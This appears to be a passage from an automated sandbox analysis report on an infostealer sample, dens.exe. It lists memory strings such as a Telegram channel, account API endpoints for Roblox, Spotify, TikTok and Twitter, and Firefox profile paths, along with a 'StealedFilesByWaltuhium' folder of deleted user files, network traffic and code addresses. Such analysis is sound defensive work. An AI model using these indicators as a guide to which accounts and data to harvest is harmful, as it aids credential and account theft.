            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9ABFF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.$
            Source: dens.exe, 00000001.00000003.1783070234.000002D9AC1C5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776400001.000002D9AC1C1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2032462700.000002D9AC1BB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034615706.000002D9AC1D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/waltuhium
            Source: dens.exe, 00000001.00000003.1783070234.000002D9AC1C5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776400001.000002D9AC1C1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2032462700.000002D9AC1BB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034615706.000002D9AC1D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/waltuhium-----
            Source: dens.exe, 00000001.00000003.2034615706.000002D9AC1D3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040589307.000002D9ACD94000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034026381.000002D9AC3C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/waltuhium----------------------
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/waltuhium0
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/waltuhium0B
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/waltuhium0g
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/waltuhiump
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/waltuhiumpZ
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC930000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.mew/waltuhium----------------------
            Source: dens.exe, 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=
            Source: dens.exe, 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=0
            Source: dens.exe, 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=P
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-resources
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/inflect
            Source: METADATA.0.drString found in binary or memory: https://tidelift.com/badges/package/pypi/jaraco.context
            Source: METADATA0.0.drString found in binary or memory: https://tidelift.com/badges/package/pypi/jaraco.functools
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1685131998.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-PROJECT?utm_source=pypi-PROJECT&utm_medium=referral&utm_c
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-resources?utm_source=pypi-importlib-resources&u
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-inflect?utm_source=pypi-inflect&utm_medium=readme
            Source: METADATA.0.drString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-jaraco.context?utm_source=pypi-jaraco.context&utm_medium=
            Source: METADATA0.0.drString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-jaraco.functools?utm_source=pypi-jaraco.functools&utm_med
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com/
            Source: dens.exe, 00000001.00000003.1703084861.000002D9AB375000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1702755471.000002D9AB333000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2048780751.000002D9AA9F0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041163716.000002D9AA9CE000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2048626589.000002D9AA9D4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039766959.000002D9AA9C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/home
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC930000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.json
            Source: dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
            Source: dens.exe, 00000001.00000002.2062222294.000002D9AB5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/e
            Source: dens.exe, 00000001.00000002.2063237923.000002D9ABD20000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
            Source: METADATA14.0.drString found in binary or memory: https://wheel.readthedocs.io/
            Source: METADATA14.0.drString found in binary or memory: https://wheel.readthedocs.io/en/stable/news.html
            Source: dens.exe, 00000001.00000003.1701110182.000002D9AB2D7000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2046290353.000002D9AB188000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701110182.000002D9AB280000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701276433.000002D9AB2D7000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060312716.000002D9AB18B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2048039347.000002D9AB18B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
            Source: dens.exe, 00000000.00000003.1667879346.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
            Source: dens.exe, 00000000.00000003.1667879346.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1667879346.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1667942178.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/FilePreviews.svg
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Klaviyo.svg
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Tidelift.svg
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Variomedia.svg
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/names.html)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes)
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: dens.exe, 00000001.00000003.2028227051.000002D9AB446000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038893022.000002D9AB456000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041611631.000002D9AB457000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066912837.000002D9ACD51000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2061658047.000002D9AB45A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1953230654.000002D9AB446000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2042317269.000002D9AB459000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2037555294.000002D9AB446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: dens.exe, 00000001.00000002.2066912837.000002D9ACD51000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065840067.000002D9AC830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
            Source: dens.exe, 00000001.00000003.1778402641.000002D9ACFEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
            Source: dens.exe, 00000001.00000003.2048626589.000002D9AA9FD000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2058173004.000002D9AAA04000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041163716.000002D9AA9CE000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2046859632.000002D9AA9FC000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039766959.000002D9AA9C5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2049325458.000002D9AA9FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: METADATA14.0.drString found in binary or memory: https://www.python.org/dev/peps/pep-0427/
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/p
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json
            Source: dens.exe, 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776400001.000002D9AC1C1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2032462700.000002D9AC1BB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034615706.000002D9AC1D3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
            Source: dens.exe, 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profilep
            Source: dens.exe, 00000001.00000003.2032142839.000002D9ABE69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/0
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.variomedia.de/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Source: C:\Users\user\Desktop\dens.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByWaltuhium\Desktop\ONBQCLYSPU.pdfJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByWaltuhium\Desktop\VLZDGUKUTZ.jpgJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByWaltuhium\Desktop\XZXHAVGRAG.xlsxJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByWaltuhium\Desktop\LTKMYBSEYZ.xlsxJump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByWaltuhium\Desktop\XZXHAVGRAG.docxJump to behavior
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0F10000_2_00007FF62C0F1000
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1108C80_2_00007FF62C1108C8
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1169640_2_00007FF62C116964
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0F89E00_2_00007FF62C0F89E0
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C115C000_2_00007FF62C115C00
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C101D540_2_00007FF62C101D54
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C10E5700_2_00007FF62C10E570
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1035A00_2_00007FF62C1035A0
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C109EA00_2_00007FF62C109EA0
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C115E7C0_2_00007FF62C115E7C
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C10DEF00_2_00007FF62C10DEF0
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1197280_2_00007FF62C119728
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1017400_2_00007FF62C101740
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C101F600_2_00007FF62C101F60
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1087940_2_00007FF62C108794
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0F98000_2_00007FF62C0F9800
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1118740_2_00007FF62C111874
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1140AC0_2_00007FF62C1140AC
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1080E40_2_00007FF62C1080E4
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1019440_2_00007FF62C101944
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1021640_2_00007FF62C102164
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1039A40_2_00007FF62C1039A4
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C10DA5C0_2_00007FF62C10DA5C
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0FA2DB0_2_00007FF62C0FA2DB
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C101B500_2_00007FF62C101B50
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1164180_2_00007FF62C116418
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C102C100_2_00007FF62C102C10
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C1108C80_2_00007FF62C1108C8
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C113C100_2_00007FF62C113C10
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0FA47B0_2_00007FF62C0FA47B
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0FACAD0_2_00007FF62C0FACAD
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C105D300_2_00007FF62C105D30
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0F10001_2_00007FF62C0F1000
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1169641_2_00007FF62C116964
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C115C001_2_00007FF62C115C00
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C101D541_2_00007FF62C101D54
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C10E5701_2_00007FF62C10E570
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1035A01_2_00007FF62C1035A0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C109EA01_2_00007FF62C109EA0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C115E7C1_2_00007FF62C115E7C
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C10DEF01_2_00007FF62C10DEF0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1197281_2_00007FF62C119728
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1017401_2_00007FF62C101740
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C101F601_2_00007FF62C101F60
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1087941_2_00007FF62C108794
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0F98001_2_00007FF62C0F9800
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1118741_2_00007FF62C111874
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1140AC1_2_00007FF62C1140AC
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1080E41_2_00007FF62C1080E4
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1108C81_2_00007FF62C1108C8
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1019441_2_00007FF62C101944
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1021641_2_00007FF62C102164
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1039A41_2_00007FF62C1039A4
